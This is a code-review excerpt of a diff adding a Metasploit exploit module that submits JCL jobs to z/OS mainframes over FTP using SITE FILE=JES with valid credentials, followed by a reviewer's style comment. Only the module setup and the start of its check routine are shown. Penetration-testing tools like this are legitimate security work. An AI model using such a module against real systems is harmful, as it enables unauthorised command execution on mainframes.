modules/exploits/mainframe/ftp/ftp_jcl_creds.rb

```diff
@@ -0,0 +1,109 @@
+require 'msf/core'
+require 'msf/core/exploit/tcp'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'             => 'FTP JCL Execution',
+      'Description'      => %q{
+       Submit JCL to z/OS via FTP and SITE FILE=JES.
+       This exploit requires valid credentials on the target system
+       },
+      'Author'           =>
+          [
+            'Bigendian Smalls',
+            'mainframed a.k.a. soldier of fortran',
+            'S&Oxballs a.k.a. chiefascot'
+          ],
+      'Arch'           => ARCH_CMD,
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['mainframe'],
+      'Privileged'     => false,
+      'Targets'        => [ ['Automatic', {}] ],
+      'DisclosureDate' => 'May 12 2013',
+      'DisableNops'    => 'true',
+      'Targets'        => [[ 'auto',{} ],],
+      'DefaultTarget'  => 0))
+
+    register_options([
+      Opt::RPORT(21),
+      OptInt.new('SLEEP', [ false, "Time to wait before checking if job has completed.", 5 ]),
+      ], self.class)
+  end
+
+
+  def check
+    ##
+    # Connect to get the FTP banner and check target OS
+    ##
+    res = connect_login
+    if not res
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failed to connect to FTP server")
+    else
+      print_good("Successfully connected to FTP server.")
+    end
+    test_jes = send_cmd( ['site', 'file=jes'] )
```

Comment:
please don't put spaces between parenthesis and arguments (see the rest of the file)